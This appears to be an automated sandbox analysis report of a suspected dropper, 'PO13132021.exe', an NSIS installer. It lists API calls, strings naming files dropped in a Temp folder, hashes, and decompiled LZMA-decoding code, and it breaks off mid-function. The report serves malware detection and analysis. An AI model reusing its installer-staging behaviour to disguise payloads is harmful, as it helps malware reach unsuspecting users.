0x00403508
0x0040351e
0x0040352e
0x00403533
0x00403539
0x00403540
0x0040354c
0x00403556
0x00403558
0x0040355a
0x0040355f
0x0040355f
0x0040356f
0x00403575
0x0040363e
0x0040363e
0x00403640
0x00403642
0x00000000
0x00000000
0x0040357e
0x00403581
0x00403589
0x00403589
0x0040358c
0x00403591
0x00403593
0x00403593
0x00403594
0x00403594
0x00403599
0x0040359c
0x0040362e
0x00403633
0x00403638
0x0040363b
0x0040363d
0x0040363d
0x0040363d
0x00000000
0x004035a2
0x004035a2
0x004035a3
0x004035a6
0x004035be
0x004035e9
0x004035eb
0x004035fe
0x00403629
0x0040362c
0x0040364a
0x0040364d
0x00403656
0x0040365b
0x00403661
0x0040366c
0x0040366e
0x00403673
0x00403675
0x004036cd
0x004036d2
0x004036dc
0x004036e3
0x004036e7
0x0040377b
0x0040377b
0x00403780
0x00403786
0x0040378b
0x004038af
0x004038b5
0x00403931
0x00403931
0x00403936
0x00403939
0x0040393b
0x0040393b
0x00403943
0x00403943
0x004038c5
0x004038cd
0x004038cf
0x004038d0
0x004038dd
0x004038f0
0x004038f8
0x004038fc
0x004038fc
0x00403904
0x00403909
0x00403910
0x0040391e
0x00403920
0x00403926
0x00403928
0x00000000
0x00000000
0x00000000
0x00403912
0x00403918
0x0040391a
0x0040391c
0x0040392a
0x0040392c
0x00000000
0x0040392c
0x00000000
0x0040391c
0x00403910
0x0040379a
0x004037a1
0x004037a1
0x004036f3
0x0040376b
0x0040376b
0x00403777
0x00000000
0x00403777
0x004036fc
0x00403700
0x00403736
0x00403736
0x00403738
0x00403740
0x004037b2
0x004037b4
0x004037bb
0x004037c3
0x004037c3
0x004037ce
0x004037d3
0x004037e2
0x004037e6
0x004037e7
0x004037f0
0x004037e9
0x004037e9
0x004037e9
0x004037f6
0x004037fc
0x00403802
0x0040380a
0x0040380a
0x00403818
0x0040381d
0x0040382f
0x00403837
0x0040383d
0x00403849
0x0040384f
0x00403859
0x0040386f
0x00403880
0x00403886
0x0040388d
0x00403890
0x00403896
0x00403896
0x0040388d
0x0040389a
0x004038a0
0x004038a0
0x004038a5
0x004038a5
0x00000000
0x004037e2
0x00403742
0x00403744
0x0040374f
0x00000000
0x00000000
0x00403757
0x00403762
0x00403767
0x00000000
0x00403767
0x0040372b
0x0040372d
0x00403731
0x00403734
0x00000000
0x00000000
0x00000000
0x00403734
0x00000000
0x0040372d
0x0040367d
0x00403689
0x0040368e
0x00403693
0x00403695
0x00000000
0x00000000
0x0040369d
0x004036a5
0x004036b6
0x004036be
0x004036c0
0x004036c5
0x004036c7
0x00000000
0x00000000
0x00000000
0x004036c7
0x00000000
0x0040362c
0x004035ed
0x004035f0
0x004035f3
0x004035f9
0x004035f9
0x004035f9
0x004035f9
0x00000000
0x004035f9
0x004035f5
0x004035f7
0x00000000
0x00000000
0x00000000
0x004035f7
0x004035a8
0x004035ab
0x004035ae
0x004035b4
0x004035b4
0x00000000
0x004035b4
0x004035b0
0x004035b2
0x00000000
0x00000000
0x00000000
0x004035b2
0x00000000
0x00000000
0x00000000
0x00403583
0x00403583
0x00403583
0x00403584
0x00403584
0x00000000
0x00403583
0x00000000

APIs

SetErrorMode.KERNELBASE ref: 00403486
GetVersion.KERNEL32 ref: 0040348C
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034BF
#17.COMCTL32(?,00000007,00000009,0000000B), ref: 004034FB
OleInitialize.OLE32(00000000), ref: 00403502
SHGetFileInfoA.SHELL32(0041FD10,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 0040351E
GetCommandLineA.KERNEL32(00423F40,NSIS Error,?,00000007,00000009,0000000B), ref: 00403533
CharNextA.USER32(00000000,"C:\Users\user\Desktop\PO13132021.exe" ,00000020,"C:\Users\user\Desktop\PO13132021.exe" ,00000000,?,00000007,00000009,0000000B), ref: 0040356F
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 0040366C
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 0040367D
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403689
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040369D
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036A5
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036B6
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036BE
DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004036D2

Part of subcall function 00406631: GetModuleHandleA.KERNEL32(?,?,?,004034D4,0000000B), ref: 00406643
Part of subcall function 00406631: GetProcAddress.KERNEL32(00000000,?), ref: 0040665E

Part of subcall function 00403A3B: GetUserDefaultUILanguage.KERNELBASE(00000002,74B5FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO13132021.exe" ,00000000), ref: 00403A55
Part of subcall function 00403A3B: lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s,?,?,?,C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000,00000002,74B5FA90), ref: 00403B2B
Part of subcall function 00403A3B: lstrcmpiA.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s,?,?,?,C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000), ref: 00403B3E
Part of subcall function 00403A3B: GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s), ref: 00403B49
Part of subcall function 00403A3B: LoadImageA.USER32 ref: 00403B92
Part of subcall function 00403A3B: RegisterClassA.USER32 ref: 00403BCF

ExitProcess.KERNEL32(?,?,00000007,00000009,0000000B), ref: 0040377B

Part of subcall function 00403949: CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403780,?,?,00000007,00000009,0000000B), ref: 0040395B
Part of subcall function 00403949: CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403780,?,?,00000007,00000009,0000000B), ref: 0040396F

OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403780
ExitProcess.KERNEL32 ref: 004037A1
GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038BE
OpenProcessToken.ADVAPI32(00000000), ref: 004038C5
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038DD
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004038FC
ExitWindowsEx.USER32(00000002,80040002), ref: 00403920
ExitProcess.KERNEL32 ref: 00403943

Part of subcall function 00405944: MessageBoxIndirectA.USER32(0040A230), ref: 0040599F

Strings

C:\Users\user\AppData\Local\Temp\Nla, xrefs: 0040375D
~nsu, xrefs: 004037AC
C:\Users\user\AppData\Local\Temp\, xrefs: 00403661, 00403666, 0040367C, 00403688, 00403697, 004036A4, 004036B0, 004036B8, 004037B1, 004037C2, 004037CD, 004037D9, 004037E6, 004037F5, 004038A4
UXTHEME, xrefs: 004034B3, 004034B8, 004034BE
Low, xrefs: 0040369F
\Temp, xrefs: 00403683
NSIS Error, xrefs: 00403524
1033, xrefs: 004036CD
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403475
Error launching installer, xrefs: 00403738
TMP, xrefs: 004036B9
C:\Users\user\Desktop, xrefs: 004037D3, 004037D8, 00403804
"C:\Users\user\Desktop\PO13132021.exe" , xrefs: 00403539, 0040353F, 004036F6
SeShutdownPrivilege, xrefs: 004038D7
TEMP, xrefs: 004036B1
.tmp, xrefs: 004037C8
", xrefs: 00403594
C:\Users\user\AppData\Local\Temp, xrefs: 00403651, 00403752, 004037FC, 00403805
C:\Users\user\Desktop\PO13132021.exe, xrefs: 0040385E

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$Exit$FileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDefaultDeleteDirectoryErrorImageIndirectInfoInitializeLanguageLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeUserValueVersionlstrcmpi
String ID: "$"C:\Users\user\Desktop\PO13132021.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Nla$C:\Users\user\Desktop$C:\Users\user\Desktop\PO13132021.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 2080809004-3585586514
Opcode ID: a9f930016ba51147cddbc041b30f05a75c8ddee43dae306d2646e158f8006db1
Instruction ID: 58fd70292e904df403817bc88459b0d0072f96867834376c9e66c0a03af616e1
Opcode Fuzzy Hash: a9f930016ba51147cddbc041b30f05a75c8ddee43dae306d2646e158f8006db1
Instruction Fuzzy Hash: 2EC1D7701047806ED7217F659D49B2B3EACEB81706F05447FF582B61E2CB7C8A198B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00406925, Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00406925() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
